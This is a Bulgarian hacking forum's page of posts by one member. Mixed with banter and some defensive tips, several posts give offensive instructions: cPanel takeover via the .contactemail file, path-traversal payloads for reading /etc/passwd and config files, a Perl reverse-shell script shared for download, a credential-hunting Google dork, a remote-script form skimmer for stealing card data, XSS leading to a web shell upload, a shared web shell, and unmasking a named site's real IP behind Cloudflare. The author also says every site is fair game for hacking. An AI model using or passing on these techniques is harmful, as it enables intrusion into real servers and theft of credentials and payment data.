Jump to content
¯\_( ツ)_/¯
  • TAD GROUP are currently hiring penetration testers. Please read the topic in Career Central subforum.
  • Sponsored Ad
ТУК НЕ СЕ ПРЕДЛАГАТ ХАКЕРСКИ УСЛУГИ ! ×

TheZero

Members
  • Content Count

    50
  • Joined

  • Last visited

  • Days Won

    15

Everything posted by TheZero

  1. Влизането в компютър не е лесна работа особено ако е лаптоп. Ще ти бъде твърде тясно да се поместиш дори и да си джудже. 🤣 Шегата на страна, иначе напълно подкрепям @Avatara.
  2. Ами то всички сайтове са за хакване. Не е легално но точно така се придобиват опит и знания. Истината е такава.
  3. Браво на момчето. Поне да не беше качвал данните. Не му ли стига само пробива? Надявам се и мисля, че вместо наказание ще получи ползи.
  4. Тука не се предлагат такива услуги а и едва ли "разбиването" на профила на жена ти ще реши проблемите ти.
  5. https://www.hackerbulgaria.com/ IP address 104.28.19.51 Cloudflare https://ftp.hackerbulgaria.com/ IP address 104.28.19.51 Cloudflare https://ftp.hackerbulgaria.com/cpanel пренасочва към https://ams202.hawkhost.com:2083/ https://ams202.hawkhost.com:2083/ IP address 172.96.184.3 И така стигнахме до реалния АйПи адрес и хостинг скрит зад Cloudflare. 😀😀
  6. Безплатни VPN програми много. Иначе има и платени версии, както е казал @ItsValle но да знаеш, че просто с една програма няма да си достатъчно "скрит" ако си замислил някоя магария.
  7. Доказателство, че въпреки така нареченият - fingerprint , сигурноста се заобикаля.
  8. Това е английската версия на сайта https://www.hirehackerservices.com/
  9. Не обиждайте професионалните хакери, че да не вземат да хакнат хакер.бг за отмъщение! 🤣🤣
  10. Искам да ви обесня една малко позната тема. Както съм споменал в заглавието, как става пробивът в cpanel след шел достъп? Когато злонамереният хакерът иска да направи повече зулуми след като е качил шел в даден сайт, той може да поиска да получи още повече привилегии. Файлът /home/jertva/.contactemail се презаписва с нов мейл адрес. После се отива на забравена парола в saitjertva.com/cpanel, паролата се променя и от там вече се влиза в cpanel. Разбира се, някои хостинги са премахнали опцията - забравена парола и номерът не минава. Все пак при наличие на cpanel в 80% от случаите, методът си работи.
  11. Споделям, един от най-добрите шелове от колекцията ми - Alfa3 на ALFA TEAM ☣ (Iranian Hackers). Шелът съдържа всички необходими инструменти за един хакер. Интерфейсът е чудесен, елементарен за разбиране и лесен за навигиране. Смъкни
  12. Реших да пусна темата за eдна популярна уязвимост LFD (Local File Disclosure) или AFD (Arbitrary File Download). Методът се exploit-ва лесно. Аз предпочитам да гледам за улеснение направо през source кода, под формата на: view-source:http://site.com/?view=/../../../../../../../etc/passwd или view-source:http://site.com/download.php?file=/../../config.php По този начин могат да се разчетат критични данни и пароли на сървъра. За какво и как може да се възползва от това, зависи от намеренията и фантазията на хакера. Ужасно много сайтове страдат от тази слабост, включително и важни такива.
  13. Kогато имаме нужда от обратна връзка с отдалечения сървър и по никакав начин не успяваме, този script написан на Perl помога почти във всички случаи. Как се използва: command > perl IP Port Примерно: perl 127.0.0.1 1212 За целта трябва да имате отворен съответен порт. Смъкни!
  14. Хакерството си е хакерство. Няма значение дали е "етично" или "неетично", разлика няма. Youtube, разните security/hacking форуми, exploit сайтове са пълни с информация и уроци. Започни с нещо много елементарно! Търси в Google следното: filetype:txt intext:username password filetype ще рече - разширение на файла. intext e съдържанието Ще видиш колко много резултати ще излязат. Ти разбира се можеш да промениш търсенето. Успех!
  15. Ще бъда кратък и надявам се ясен. В един пробит сайт, хакерът може да постави javascript код и по този начин може да открадне всички въведени данни от дадена форма. Не е нужно да инжектира целият дълъг код, а просто да се извика от отдалечен сървър под формата на <script src="http://drug-website/gaden-script.js"></script> По този начин се правят сериозни зулуми. Един от най-лощите сценарии е вграждането на такъв код в интернет магазин и кредитни карти например. Ето и един сайт обесняващ с демо, как става самото крадене. http://www.stealmylogin.com/demo.html Има и други техники но на тях ще се спра може би в някоя друга тема.
  16. Проверете, дали са ви хакнали? Публикуваха списък на 7,695,066,389 хакнати акаунти. Това е световен рекорд от всички времена. На сайта https://haveibeenpwned.com/ може да проверите, дали и вашият e-mail адрес е компрометиран. Добре е, да си смените веднага паролите. На същият сайт има доста подробности около пробивите. Също така, може да се свали и списъка на паролите. https://haveibeenpwned.com/Passwords
  17. Колеги, добре е, че държите на българското, но защо не си прегледате никовете? Май и те не са български.
  18. Добре е да се отбележи, че reflected XSS се блокира от XSS AudItor-а под Google Chrome. Просто не работи. В този смисъл Chrome е полезен. Незнам и за актуален bypass в момента.
  19. Това, би трябвало да ти помогне: https://www.malwarebytes.com/mwb-download/
  20. Наистина гигантска база данни за MD5 hashes. https://hashkiller.co.uk/md5-decrypter.aspx
  21. Ако е така, както описваш, това е признак на шпионски софтуер. Използвай друго устройство за смяна на паролите, докато си изчистиш компютъра/телефона. cybercrime.bg няма да ти помогнат, за тях това са дреболии.
  22. Бях чел нещо подобно и за хиляди е-магазини натряскани с промени в javascript файловете. Защо ли не си мушкат злобните скриптове в server side файлове? Така поне остават - "невидими". Явно имат оправдателна причина. Попадал съм на шмекерии в php файлове за крадене на пресни данни, които пак препращат плячката навън. Големи изобретателности!
  23. Ето това е истината! Единствено "на живо" се правят експерименти. Тестове на localhost не означават нещо особено.
  24. Ха, интересно! Все пак има напредък, щом са ти обърнали внимание и дори са те award-нали с 100 £. Като стане дума за XSS, обикновено се мисли, че най-много може да се задигне админ сесията. Истинското шоу става след като инжектнатият javascript сочи към payload, предизвикващ CSFU (Cross-Site File Upload). И бууум - имаш качен shell. Хаха, това с инжектирането на <div> го имаше и на № 1 българската емейл платформа, разбира се id-то на div-а е дефинирано за цялата страница. Жертвата си отваря полученият имейл и що да види - "Сесията ви изтече, влезте отново!" Смях голям....
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.